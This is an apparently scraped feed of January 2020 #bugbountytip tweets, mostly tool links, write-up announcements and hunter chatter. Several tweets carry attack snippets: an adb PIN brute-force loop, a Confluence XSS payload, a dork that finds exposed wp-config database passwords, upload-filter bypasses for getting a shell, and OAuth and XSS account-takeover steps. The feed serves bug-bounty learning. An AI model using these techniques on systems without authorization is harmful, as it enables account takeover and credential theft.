4 Life of Cyber Security Professionals 🤖🤖🤖 Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/5mjA2uBFTJ
x1m
@x1m_martijn


2020-01-28 09:08:24
0 Clean desk, clean mind 😌☺️ #infosec #bugbountytip https://t.co/Q8YxsF6cr6
Th3Alch3mist~
@Debian_Hunter


2020-01-28 07:32:17
0 Sweet as candy 🍬 nice tip #bugbountytip #infosec https://t.co/uWJAWNJpv9
Hx01
@Hxzeroone


2020-01-28 06:47:12
0 @Kr0t3 I’d suggest creating a twitter bot which fetches tips with hashtags like #bugbountytip
Mashoud1122
@mashoud1122


2020-01-27 18:01:55
2 There are some endpoints show JSON, but forget to set the header to “Content-type: application/json” and leave it as “Content-type: text/html” , and they show special chars , easy XSS ;) #bugbountytip #bugbountytips #BugBounty
o k t a v a n d i
@0ktavandi


2020-01-27 11:49:23
0 Never trust a public cheatsheet , cheatsheet is just a reference for purpose development , make your own cheatsheet #protip #bugbountytips #bugbountytip
bug bounty tips - Retweet
@YourNextBug


2020-01-27 10:20:59
2 Send Any Message From Snapchat to anyone. Snapchat Hacked By: Mohammad Khizer Javed https://t.co/LnkvBjqndu #bugbountytips #bugbountytip #bugbounty
M. Khizer Javed
@KHIZER_JAVED47


2020-01-27 08:57:21
0 Instant Admin Access!! #Takeaways always check JS files and request responses. This tool by @jobertabma is pretty good in looking for endpoints https://t.co/1iTFImCerY #BugBounty #bugbountytips #bugbountytip
Tomi
@noobe_io


2020-01-27 06:33:24
0 Start this week with Authentication Bypass XD #BugBounty #bugcrowd #bugbountytip https://t.co/kh7QfZoECi
Himanshu Giri
@Himanshuraj17Hr


2020-01-27 06:18:18
2 If there is no rate limit on PIN functionality of Android APK ,but the app is protected by every mechanism, then try to brute Force using adb . for i in {0000..9999}; do adb shell input text $i ; done #BugBounty #BugBountyTip #bugbounties #bugbountytips #600$
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2020-01-27 04:35:18
0 #RDP #HACKING Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/FoMZwetU8T
human
@t0ddpar0dy


2020-01-26 23:13:03
0 Show. Me. Your. Vuln Face! You know—the face you make when you’ve found the unthinkable.. #BugBountyTip #BugBounty #hackers
m0z
@LooseSecurity


2020-01-26 18:57:33
0 For enumerating subdomains I always use @zer0pwn's Spyse API wrapper. It's so f'in good! https://t.co/zBAsuiKw7c #bugbountytips #bugbountytip #bugbounties #bugbounty #infosec
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2020-01-26 17:22:52
3 #redteam Security Assessments Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone #follow https://t.co/CGKg7E7EiX
Maximiliano Soler
@MaxiSoler


2020-01-25 22:48:09
1 It has been a blast! Seeing the local community sharing and helping each others. Kudos @ylevalle @soyelmago and @Hacker0x01 Crew @Arl_rose & @sgtcardigan 🇦🇷 #BugBountyTip #togetherwehitharder 💪🏾 https://t.co/xj6RDkiLiL
Ammar Amer🇸🇾
@cry__pto


2020-01-25 22:41:08
8 -PENTESTING-BIBLE: https://t.co/q2layzVpKz -OSINT_TIPS: https://t.co/gNMSDGULS6 #BugBountyTip #Hacking #pentest #OSINT #redteam #Malware #CyberSecurity #Linux #html5 #computerscience #infosec #Python
Junaid Khan
@akajunoon


2020-01-25 18:59:05
0 Last Two Months was so surprising for me ... Demanded infinite help from other to learn Bug Hunting but sadly one thing i learned ... They will help you until and unless you have something giving them back . #bugbountytips #hackerone #BugBountyTip #hackers
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2020-01-25 17:41:59
0 Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/FmFBqH5ihS
noobSecurity
@noobsec_org


2020-01-25 16:07:26
2 Always view the page source code, sometime u get some GOLD like mdfk this💰💰💰💰💰 P1 just in 5 minutes #bugbountytips #bugbountytip #OuthackThemAll #ItTakesACrowd #togetherwehitharder https://t.co/eFXvbt5abw
Katie Paxton-Fear
@InsiderPhD


2020-01-25 16:00:01
11 🚨New video! This week we talk about CSRF bugs, definitely one of the more technical beginner bugs, but actually not that difficult once you get your head around them. Case studies as usual but also some PoC code + a demo #BugBounty #bugbountytip https://t.co/zUxcUwLts9 https://t.co/Ia75ItLYDj
Sayaan Alam
@ehsayaan


2020-01-25 13:16:05
1 Just did a write-up on my recent finding. #bugbountytip #writeup #bugbounty “Accidental IDOR that Deleted Admin Account.” by Sayaan Alam https://t.co/LURpTYicyi
Imran Parray
@CreedHackers


2020-01-25 12:50:53
2 #bugbountytip Mastering a single bug class is better than being noob at everything. #bugbounty #infosec
Hussein Daher
@HusseiN98D


2020-01-25 12:28:21
2 #BugBountyTip time: combine Arjun from @s0md3v with BurpIntuder to bruteforce parameter values. I once got "?debug" as a valid parameter and got "on" as a good value which disclosed juicy information helping me chain bugs to a P1. Final: "?debug=on" #bugbountytips #pentest RT & L
Leonishan
@leonishan_


2020-01-25 11:12:49
3 Detecting valid tags/events on XSS exploitation. A script to find suitable XSS payloads after analyzing how tags/events are filtered. https://t.co/u6WxTL5gBe https://t.co/n9zMuRW8gX #XSS #bugbountytip #bugbounty
Th3Alch3mist~
@Debian_Hunter


2020-01-25 10:28:39
0 I Found this tool while recon and let me tell you something "IT'S AWESOME!! " xd check this out it collects many information automatically using different tools so you must run it if you are starting a new program #bugbountytip #bugbounty #bugbountytool https://t.co/M2FUBHycMM
Sayaan Alam
@ehsayaan


2020-01-25 09:00:00
0 Good Opportunity to protect your country.. #bugbountytip https://t.co/xcTrdnlM7r
reconness
@reconness


2020-01-25 00:57:13
0 Remember you can join us in our Discord Server https://t.co/LIWdtvdJmT #bugbountytip #Pentesting #recon
M. Khizer Javed
@KHIZER_JAVED47


2020-01-24 18:12:20
1 #BugBountyTip While looking in github for information desc do check commit history sometimes they remove the tokens but don't change or revoke them ;) https://t.co/r05vUKKkuX
bug bounty tips - Retweet
@YourNextBug


2020-01-24 16:34:38
0 Read Any File using .odc file Hacked By @pnig0s Read Here https://t.co/lpqCZYApLX #bugbountytips #bugbountytip
thehackerish
@thehackerish


2020-01-24 07:13:36
0 I remember when I saw Sqlmap the first time mentioned in @rootme_org, I was exploiting #SQL injections manually or via Python scripts, then fell in love with how effective Sqlmap was. #BugBountyTip: It is a must have tool to master, follow @sqlmap for advanced usage.
bug bounty tips - Retweet
@YourNextBug


2020-01-24 02:31:48
1 Found a b-sqli Status-same Cont. Length - Same Visible Content Same Looking at source code found that right query adds a <div></div> false query remove the <div></div> But No change in content length, probably it was adding something else. #bugbountytips #bugbountytip
ｙｏｄｈｈａ
@y0dhha


2020-01-23 22:46:52
2 1) skf-labs :> Repo for all the OWASP-SKF Docker lab examples https://t.co/7cIL06hS9Y #) KernelMalware https://t.co/1HrR6S7LWx #bugbounty #bugbountytips #BugBountyTip #kernel #malware
ｙｏｄｈｈａ
@y0dhha


2020-01-23 22:43:50
0 1) New Muhstik Botnet Attacks Target Tomato Routers https://t.co/AHgAbfr8CE 2) AlertResponder - Automatic Security Alert Response Framework By AWS Serverless Application Model https://t.co/aVNdKucwHG #bugbounty #bugbountytips #BugBountyTip
Virus
@Virus0X01


2020-01-23 21:16:15
0 read my write up about CORS i found in a private program #bugbounty #BugBountyTip https://t.co/tLvlcrf7SO
0xNoah
@ncnx700


2020-01-23 20:46:49
1 I want to get my blog set up. I'm interested in what people think the best platform or method of going about it is. I'm willing to manually set up and configure one if I choose to host it myself. Please retweet for visibility! #infosec #CyberSecurity #OSINT #H1 #BugBountyTip
terjanq
@terjanq


2020-01-23 16:31:52
5 I started writing solutions to my challenges on #justctf quite a time ago but haven't had enough time to finish it. I decided to publish these very chaotic writeups to Dominoes, Scam Generator and p&q service. #xssearch #bugbountytip https://t.co/eImStmRiuT
Damian Schwyrz
@damian_89_


2020-01-23 15:39:16
0 Nice, found an older adminer version on a host which allows using "Elasticsearch (beta)" as a source and it turns out, we can abuse this. At least blind ssrf ;) #bugbountytip https://t.co/rj59BI1SHv
Hendrik
@hendrikvb


2020-01-23 14:14:50
0 Asking for a friend: #ethicalhacking means you *should not* abuse a sequential recipient ID in a spam newsletter “View Online” link and click unsubscribe for all victims.. right? #BugBountyTip #spam
Eduard Tolosa
@Edu4rdSHL


2020-01-23 12:30:17
5 Bash function to check domain wildcards. Add it to your .bashrc and use it with: check_wilcard domain.example #bugbounty #bugbountytips #bugbountytip #bash #linux https://t.co/Sa1z4u8Lfy
Jenish
@_jensec


2020-01-23 08:24:43
13 2nd critical of this week. #BugBountyTip Abuse OAuth Sign-up flow: 1) Use phone number instead email in 3rd party to sign-up. 2) Link victim's email to your 3rd party account while signup on target. 3) Login to victim's account using your 3rd party account. https://t.co/4yrK5KXa4v
SPAWN POINT GAMING
@gametestingsp


2020-01-23 06:58:07
0 A #game plagued by #Bugs/#Glitches is the worst nightmare for #GameDevelopers! So what are bugs and their types in a game? Click here to read this #BLOG 👉🎮 https://t.co/y5BiX492wh #Gamedev #BugBountyTip #Indiedev #MobileGame #Androidgames #readers #article #gamingblog #unity
GokhanGK
@gkhck_


2020-01-23 06:55:02
1 Atlassian Confluence 3.4.x - Error Page Cross-Site Scripting Payload : %3CIFRAME%20SRC%3D%22javascript%3Aalert%28%27XSS%27%29%22%3E.vm CVE-2018-5230 https://t.co/Ulv9nwcnQv #bugbountytip #bugbountytips https://t.co/nXx2Xiu4jQ
Jerry @unitedconindia
@lordjerry0x01


2020-01-23 05:12:08
0 You may find this useful 😉 #BugBountyTip #bugbounty #hacking https://t.co/wWk7EwV7zS
Nassec.io
@nassecio


2020-01-23 03:30:51
8 @evilboyajay comes up with another #bugbountywriteup on this week's blog - this time about Host-Header Injection. #informationsecurity #cybersecurity #bugbounty #infosecmatters #writeups #hostheaderinjection #bugbountytip https://t.co/E7hXZo0XaV
Th3Alch3mist~
@Debian_Hunter


2020-01-23 03:11:35
0 Check this out it's cool #bugbountytips #bugbounty #BugBountyTip https://t.co/49rkPVwoDQ
Hussein Daher
@HusseiN98D


2020-01-22 23:06:21
18 #BugBountyTip time: I've got a RCE by using this tip: while testing for malicious file uploads, if .php extension is blacklisted you can try .PhP , .php5 and .php3 Sometime this fools the backend and you get shell! RTs & comments are appreciated. Follow #bugbountytips #pentest
ｙｏｄｈｈａ
@y0dhha


2020-01-22 22:01:22
1 Bugbounty Checklist By Sehno https://t.co/wshOrucUjT #bugbounty #BugBountyTip #bugbounty2020goals #bigbountytips #infosec #security #nullcrowd https://t.co/0FoTN4pcEf
bug bounty tips - Retweet
@YourNextBug


2020-01-22 18:02:41
2 One can drive a bike at 80km/hr and someone can drive the same bike at 120 km/hr. Its matter of knowing the tool and practicing it. BLOG ON SHODAN Using Shodan Better Way by @0xrudrapratap https://t.co/HUrxeMQM94 #bugbountytips #bugbountytip
Rafin Rahman Chy
@rafinrahmanchy


2020-01-22 17:56:27
0 Guides for Business Logic Flaw https://t.co/chT0dwJAee https://t.co/RnwFmNfdwj https://t.co/t9aNa8GVOe #BugBounty #bugbountytip #bugbountytips #websecurity #appsec #netsec #pentesting #pentest #EthicalHacking #EthicalHacker #Hacking #Hacker #InfoSec #InfoSecurity #CyberSecurity
bugbountymemes
@bugbounty_memes


2020-01-22 16:27:28
0 #bugbountytip when report closed as duplicate 😀😀 https://t.co/p7IrtWLPED
Cryptographer
@crypt0gr4ph3r


2020-01-22 16:24:27
3 Awarded $100 bounty on @Hacker0x01 in less than 1 minute 1. Reported bug and got duplicate :( 2. Added in original report 3. Waited for fixed. Before :- x(.)com/abc/payload 3. Bypassed fix :- Just changed to :- x(.)com/abC/payload #bugbounty #bugbountytip #hackerone
bug bounty tips - Retweet
@YourNextBug


2020-01-22 15:19:25
2 Just Like Second order sqli and xss, Here is Second order IDOR. MUST CHECK OUT #bugbountytips #bugbountytip #bugbounty https://t.co/wWdvIjNBOt
Eduard Tolosa
@Edu4rdSHL


2020-01-22 14:29:12
1 Second part of “Subdomains Enumeration: what is, how to do it, monitoring automation using webhooks and centralizing your findings” is coming soon. Follow me to be aware. First part quoted. #BugBounty #bugbountytip #recon #hacking #osint #findomain #bugbountytips #webhooks https://t.co/SHKFdYiq2K
Ankit(Rudra16)
@rudra16t


2020-01-22 12:20:55
2 Watch our expert @fransrosen keynote from @bsidesahmedabad #infosec #bugbounty #BugBountyTip https://t.co/KL8BybPIaV
BSides Ahmedabad
@bsidesahmedabad


2020-01-22 12:17:04
8 Watch @fransrosen Keynote at #bsidesahmedabad2019 https://t.co/hcJkB3r3po #BugBountyTip #bugbounty #KeynoteSpeaker #infosec #Pentesting #hacking #Hacked
Ismayil Tahmazov
@Tismayil1


2020-01-22 11:30:41
2 @AsrcSecurity thanks for gifts. #bugbounty #bugbountytips #BugBountyTip #bugbounty2020goals https://t.co/0jn1CUTjEH
Yadhavi
@PrincessYadhavi


2020-01-22 08:35:53
0 anyone know golang version of whatweb tool? #bugbounty #bugbountytip #bugbountytips
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2020-01-22 08:28:47
3 Connected Cars #hacking 👇👇👇👇👇👇 Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/hE4MdPWXNu
Hussein Daher
@HusseiN98D


2020-01-21 22:34:45
17 #BugBountyTip time: when you see a POST request made with JSON, convert this to XML and test for XXE. You can use "Content-type converter" extension on @Burp_Suite to achieve this! #bugbountytips #infosec #hacking #pentest #pentesting #bugbounty RT and Follow, book coming!
ｙｏｄｈｈａ
@y0dhha


2020-01-21 21:32:55
0 Awesome GitHub Repos 9. Awesome Web Security = https://t.co/JYwoh7QCdy 10. Penetration Test Guide based on OWASP = https://t.co/6YKTRRvvTZ 11. Pentest Compilation = https://t.co/fbpKJXGnWI 12. Infosec Reference = https://t.co/KSGiX8Vv1D #bugbountytips #bugbountytip #hacking https://t.co/j75f0AfTpa
ｙｏｄｈｈａ
@y0dhha


2020-01-21 21:32:15
0 Awesome GitHub Repos 5. Awesome Web Hacking = https://t.co/tS4wYzEZ4v 6. Awesome Hacking Resources = https://t.co/i6d4C1OIzN 7. Awesome Pentest = https://t.co/eZ5mDtUi3a 8. Awesome Red Teaming = https://t.co/zu17ZEK16J #bugbountytips #bugbountytip https://t.co/FfNJ4D2imR
ｙｏｄｈｈａ
@y0dhha


2020-01-21 21:31:30
0 Awesome GitHub Repos 1. Book of Secret Knowledge = https://t.co/kLqcHAo7gV 2. Awesome Hacking = https://t.co/vRBXZkxI29 3. Awesome Bug Bounty = https://t.co/lMh6dqBGN1 4. Awesome Penetration Testing = https://t.co/9cDaJLVKGm #bugbountytips #bugbountytip #hacking https://t.co/yCTNbsHWcr
Kenan
@kenanistaken


2020-01-21 20:39:11
1 newbies ask,where to start,what to learn. start at home,start at work,start wherever you want,just start. learn whatever you want. no need to ask these questions anymore anybody. I'm here because I am experienced computers since 90s. you still ask where to start 😂 #bugbountytip
bug bounty tips - Retweet
@YourNextBug


2020-01-21 18:12:29
0 What was your worst bug bounty mistake? #bugbounty #bugbountytips #bugbountytip
healthyoutlet
@healthyoutlet


2020-01-21 17:06:44
0 When devs are nice enough to leave an accessible sourcemap, use this tool to download everything so you don't have to analyze the code in your browsers debugger: https://t.co/bS6dJmXkOY #bugbountytip
bug bounty tips - Retweet
@YourNextBug


2020-01-21 16:47:15
0 What was your worst bug bounty mistake? My was reporting Sql databse username and password leak to a out of scope domain, report got not valid and -ve points, although they fixed that. -_- #bugbounty #bugbountytips #bugbountytip
Eduard Tolosa
@Edu4rdSHL


2020-01-21 14:25:59
2 `sudo -l` gives you a list of allowed and forbidden commands for the current user. It's useful because sometimes people allow certain (dangerous) commands without using password, so you can do a local privilege escalation. #linux #bugbountytip #BugBounty
OWASP Web Security Testing Guide
@owasp_wstg


2020-01-21 11:46:01
0 Without a strong lockout mechanism, the application may be susceptible to brute force attacks. 🤜🚪 Use combinations of incorrect password attempts and correct login credentials to test lockout mechanism rules. #cybersecurity #bugbountytip #appsec https://t.co/lWVLEqWX0Z
ｙｏｄｈｈａ
@y0dhha


2020-01-21 10:54:00
0 - Hey folks <3 Here is a "OSINT , Capture the flag" challenge :) This is a mixture of OSINT & steganography challenge ♥️ Attachment: https://t.co/61DLQoCROi Password - nullcrowd #ctf #ctfchallenge #bugbountytips #bugbountytip #bugbounty2020goals https://t.co/0EAqyPy3Ln
thehackerish
@thehackerish


2020-01-21 09:59:30
0 When looking on known exploits for a target, Twitter can help you: search "target #bugbountytip". The #BugBounty community can surprise you sometimes with cool tricks!
ηαe⁷
@chocolatey_tae


2020-01-21 09:28:31
2 Hey guys , Every Hacker should join this platform ASAP it's damn cool . https://t.co/kH0TUTWYJW #hacker #BugBounty #bugbountytip
Cipher_942
@Ciper_942


2020-01-21 09:26:52
0 Hey guys , Every Hacker should join this platform ASAP it's damn cool . https://t.co/xZYf0qZTkd #hacker #BugBounty #bugbountytip
niravsikotaria
@niravsikotaria


2020-01-21 03:09:04
5 Challenge Link: https://t.co/8y1ld1iXkq Parameter: ruid Bug Type: Expression Language Injection Send POC in PM. @gabsmashh @stokfredrik #hacking #pentesting #infosec #bug #bugbounty #hackerone #bugbountytip #bugbountytips
Aashish Yadav
@aa5h15h


2020-01-20 20:21:18
4 First Steps in Hyper-V Research https://t.co/oM3FgO4A2e #research #infosec #cybersecurity #pentest #redteam #exploit #hackerone #hyperv #bugbounty #malware #virtualization #oracle #virtualbox #bugbountytip #windows #linux #unix #dev #bugcrowd #RETWEEET #programming https://t.co/vOEH9qiR6E
Hussein Daher
@HusseiN98D


2020-01-20 20:07:28
16 Time for a new #bugbounty tip! When I sign up to a website/newsletter/reset password, I look at the website which hosts the logo/image in the email I receive. This led me multiple time to insecure AWS S3 buckets and scope expansion. #bugbountytip #bugbountytips #infosec #hacking
bug bounty tips - Retweet
@BugbountytipsR


2020-01-20 16:32:50
0 I have been reading diff API testing related article but didn't find any direct/satisfied article that can dive me in deep. It will be really gr8 if you guys can share some article/presentation/video or your own tip :) #bugbountytips #bugbountytip (1/2)
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2020-01-20 14:02:48
0 Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/8hvsLmZL9C
Dr.FarFar 🇪🇬🇨🇦
@3XS0


2020-01-19 22:00:04
0 I wrote a small guide with some common techniques to bypass WAF, focus on SQL injection.. https://t.co/MjI0yCtJ7V #bugbountytips #bugbountytip
Ammar Amer🇸🇾
@cry__pto


2020-01-19 20:43:51
4 -Sample penetration testing report: https://t.co/crnmtmack8 -Tips on writing a penetration testing report:: https://t.co/BRfhyllyLe -Technical penetration report sample:: https://t.co/3XGsBppDN4 -Nessus sample reports: https://t.co/xaKxlGxtkj #bugbountytip #Hacking #PenTest
Hussein Daher
@HusseiN98D


2020-01-19 20:18:45
5 I must say sorry to all my #bugbounty and #infosec followers for being off for the past month. But no worries, I'll come back with exciting news soon. I'll be hiring too! Stay tuned for a #bugbountytip tomorrow 🎉
inc0gbyt3
@incogbyte


2020-01-19 20:06:29
1 I wrote a small guide with some common techniques to bypass WAF, focus on SQL injection.. https://t.co/uM6v58Ufzt #bugbountytips #bugbountytip
Vishnu Vardhan Gadupudi
@vishu10x00


2020-01-19 19:51:19
0 One liner to get root domains, by @nahamsec #bugbountytip cat hosts | rev | cut -d "." -f 1,2,3 | rev | sort -u
Anshuman Pattnaik
@anspattnaik


2020-01-19 03:12:24
0 #BugBounty #bugbountytip Found many open ports for a target port 22 - ssh (required password) port 21 - FTP (required password) port 445 - SMTP (required password) port 53 - domain (Possible Dos attack) port 8443 - Admin login page (required password) Should I report it?
Kyle
@B3nac


2020-01-19 02:52:16
0 If the default login request is POST check in Burp if GET is allowed and append the post attributes. For example. https://example . com/login?&username=TotallySecure&password=hunter2 If there is no CSRF token $. #bugbountytip
myo ko
@nutronex


2020-01-19 02:41:59
0 #bugbountytips #bugbountytip tagged as duplicate after 2 weeks :) https://t.co/5aOJw8BEjE
thehackerlab.io
@the_hacker_lab


2020-01-19 00:03:03
2 Rewrote my recon bot to output to markdown and upload to a git server and I love it, next step is to make it a docker container so I can swarm all the wildcards #BugBounty #hackerone #bugcrowd #bugbountytip Only a few of the steps are shown here but add it to your workflow
thehackerlab.io
@the_hacker_lab


2020-01-18 23:45:21
0 Over 50 Domains with XSS found this week on an old AF public program.. then triaged by hackerone.. it was raining alert(https://t.co/7GXCCGXJgp) #bugbountytip Just keep looking....... the bugs are out there !
bugbountytip
@a_l_e_r_t_1_


2020-01-18 18:12:20
1 GET /xyz 404 NOT FOUND GET /xyz/abc 200 OK GET /xyz 403 FORBIDDEN GET /xyz/abc 200 OK Look everywhere !!! #bugbountytips #bugbountytip
bug bounty tips - Retweet
@BugbountytipsR


2020-01-18 16:45:48
0 Site: If a post get 1000+ report abuse then site will automatically delete post. h1_squirtle: Clicking the "Report Abuse Button" 1000 TIme. ============= BOOM Post Deleted ============= $$ 300 $$ Profile: h1/h1_squirtle https://t.co/lWhHQIrwEC #bugbountytips #bugbountytip
ｙｏｄｈｈａ
@y0dhha


2020-01-18 12:45:49
0 Task: Find flag, and send your flag to me Hint: It looks like binary but it's not that Don't share your flag Flag Type - NULLCROWD*{} I'll post a solution when the challenge is closed Attachment: https://t.co/x0VIjoGjFT Password - nullcrowd* #bugbountytips #bugbountytip #ctf https://t.co/SXe1drnzLP
dark_warlord14
@dark_warlord14


2020-01-18 08:18:29
0 Guide on how to proxy https traffic from emulator via burpsuite. It works. https://t.co/su35MeoCU4 #bugbountytip
ｙｏｄｈｈａ
@y0dhha


2020-01-18 06:22:31
0 Hakrawler - Simple, Fast Web Crawler Designed For Easy, Quick Discovery Of Endpoints And Assets Within A Web Application https://t.co/WQ22tfAnmm #bugbounty #bugbountytips #bugbountytip #bugbounty2020goals
ｙｏｄｈｈａ
@y0dhha


2020-01-18 06:21:28
0 1) Cable Haunt Vulnerability Haunts Cable Modems Using Broadcom Chips https://t.co/TTH8SCVSqa 2) Testing for XSS (Like a KNOXSS) https://t.co/kvdt9AjTKQ 3) Hacking Java Deserialization https://t.co/MnvJmuTvaJ #bugbounty #bugbountytip #bugbounty2020goals
Jason
@zeroauth


2020-01-18 02:44:11
0 Want to hear a Bounty Hunter fail? my ImageTragick test payloads this entire time had a typo of my callback address, so this entire time testing image uploads were worthless, and I never documented where they were... #bugbountytip #bugbountytips
healthyoutlet
@healthyoutlet


2020-01-17 22:42:44
0 Click-to-copy feature for an API key? Check for x-frame-options / frame-ancestors. If you can frame the page you can clickjack the key with just a click and a ctrl-v. #BugBountyTip
thehackerish
@thehackerish


2020-01-17 18:00:06
1 #bugbountytip: If you are struggling to run #hashcat on your host, you may want to run it in #docker instead. I've had success with it, cracking 6 passwords in an assignment. https://t.co/S81qOwyOWs
Dr.FarFar 🇪🇬🇨🇦
@3XS0


2020-01-17 17:17:15
0 #bugbounty #bugbountytip #hacking New platform for bug hunting ...join fast !!!! https://t.co/1zOHSPhURn …
Karna
@karna__1


2020-01-17 17:06:08
0 #BugBountyTip #bugbountytips #infosec Yep. A huge difference indeed! When you feel all down and exhausted and messed up, just go get some sleep! Chances are you'll wake up the next day with a different kind of energy :) Take rest and get merry @ArchAngelDDay <3 https://t.co/HKXAMiM37m
B.S aymen
@depression0x01


2020-01-17 11:02:02
0 Anyone here is using RSS feeds ? and which channels are u following for being aware about new CVE's I can't find nist cve channel ? #Security #BugBounty #bugbountytips #BugBountyTip #RSS_FOR_ALL #CVE
Sayaan Alam
@ehsayaan


2020-01-17 08:02:07
0 Just Submitted a Critical Subdomain Takeover to Account Takeover Vulnerability.... Hope For the Best!!! #Hacked #bugbounty #BugBountyTip
Dr.FarFar 🇪🇬🇨🇦
@3XS0


2020-01-17 06:34:36
0 #BurpSuite #bugbountytip #bugbountytips Burpsuite extension: phpStudy Backdoor Remote Code Execution Scanner https://t.co/ZBC76PiwTP
Paulos Yibelo
@PaulosYibelo


2020-01-17 05:26:30
2 This is one common way for me to find high severity auth bypass vulnerabilities in high profile targets. Example: https://t.co/9GffzeEp0m #bugbounty #bugbountytip https://t.co/mrgnQhnue5
Dr.FarFar 🇪🇬🇨🇦
@3XS0


2020-01-17 01:20:06
2 Just spent about an hour to bypass an odd filter for a content spoofing/HTML injection flaw in automated emails. Had to 1) Avoid using spaces (see use of / in image), 2) Perform parameter pollution on the "username" field to have multiple HTML elements. #bugbounty #bugbountytip https://t.co/8x01PWjpmW
Dr.FarFar 🇪🇬🇨🇦
@3XS0


2020-01-17 00:50:46
2 Always try to check SSTI Vuln on username params in password reset pages or any mail endpoint, + try fuzzing the same payload in other inputs, cuz may the payload reflect on the body of the mail and not - lemme say for example - in the account details. #bugbountytip #BugBounty
Dr.FarFar 🇪🇬🇨🇦
@3XS0


2020-01-17 00:15:30
2 Using a reflected xss to steal FB Auth tokens If login with facebook is available,use the rxss to show the location hash Put the rxss url in the facebook auth flow [redirect_uri] See the magic view the pic for more #BugBounty #BugBountyTip #bugbountytips mistknly deld the old twt https://t.co/qibBdtN35d
Mrityunjoy
@mitunjoy11


2020-01-16 17:06:55
2 #BugBountyTip When you looking for bugs on a program, always check for programs browser extensions, some times you can got some cool SSRF ;) https://t.co/b1a1zitFjS
siLLyDaDDy
@sillydadddy


2020-01-16 15:50:38
3 #bugbounty #bugbountytip #hacking New platform for bug hunting ...join fast !!!! https://t.co/bqBhpeLOtz
Ammar Amer🇸🇾
@cry__pto


2020-01-16 13:34:57
4 Using CeWL to map a website to build a custom wordlist(for password crackers),using words and phrases scraped from the target web pages: cewl -v -d 2 -m 5 -w results http://xx.xx.xx.xx/home/ -d=Depth to spider -v=Verbose output -m=Minimum word length #bugbountytip #Hacking
intigriti
@intigriti


2020-01-16 13:02:13
36 So you believe UUID's are a sufficient protection against IDOR's? Think again! 🤦 Thanks for the #BugBountyTip, @securinti https://t.co/zx5Xn7iDrE
BSides Ahmedabad
@bsidesahmedabad


2020-01-16 09:02:11
4 Closing note of @stokfredrik at #bsidesahmedabad #bugbountytip #bugbounty #infosec https://t.co/eKeJK1PmYf
Ahmed M. Elhady
@Br3akm30ut


2020-01-15 20:04:58
5 Always try to check SSTI Vuln on username params in password reset pages or any mail endpoint, + try fuzzing the same payload in other inputs, cuz may the payload reflect on the body of the mail and not - lemme say for example - in the account details. #bugbountytip #BugBounty
dark_warlord14
@dark_warlord14


2020-01-15 17:08:32
0 inurl:wp-config.php intext:DB_PASSWORD -stackoverflow -wpbeginner -foro -forum -topic -blog -about -docs -articles This google dork is scary as shit. #bugbountytip https://t.co/vWkHcHIMDN
@cr33pb0y
@theyiyibest


2020-01-15 06:56:09
0 Yay, I was awarded a $XXX bounty on @Hacker0x01! First RXSS of the year. Payload: [1].map(alert) https://t.co/7vrkzfnbNA #TogetherWeHitHarder #bugbountytip #wafbypass
Eduard Tolosa
@Edu4rdSHL


2020-01-15 05:54:39
0 @Docker The image size is just 41MB! Special mention to @Spaceprogrammer for the idea and initial dockerfile! #bugbounty #bugbountytips #bugbountytip #osint #recon #tools
Dr.FarFar 🇪🇬🇨🇦
@3XS0


2020-01-14 23:52:49
0 #BurpSuite #bugbountytip #bugbountytips Burpsuite extension: phpStudy Backdoor Remote Code Execution Scanner https://t.co/FzqCz83DY3
bugbountytip
@a_l_e_r_t_1_


2020-01-14 22:05:09
0 Can I bypass it ? Any suggestions ? ( \ ) #bugbountytips #bugbountytip https://t.co/WshiSHcmrM
Hasan
@hasan_zmzm


2020-01-14 20:20:14
0 Simple #1 rule. #BugBountyTip https://t.co/rUq3znRuov
Nick || hunt4p1zza
@ngkogkos


2020-01-14 19:08:56
3 Just spent about an hour to bypass an odd filter for a content spoofing/HTML injection flaw in automated emails. Had to 1) Avoid using spaces (see use of / in image), 2) Perform parameter pollution on the "username" field to have multiple HTML elements. #bugbounty #bugbountytip https://t.co/5KxNTLvx4l
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2020-01-14 17:50:39
2 Defenders think in lists. Attackers think in graphs. As long as this is true, attackers win. #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #CyberSecurityTraining #devsecops #cybersecurity #training #ceh #eccouncil #certification #hackerone
Zero Xyele
@zeroxyele


2020-01-14 17:50:29
0 Get intelligence alerts from your targets using by https://t.co/ceSFlbIYul! (@_IntelligenceX) #hackerone #hacker101 #bugbounty #bugbountytip #bugbountytips #bugcrowd #intelligence https://t.co/rj4FQavyU0
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
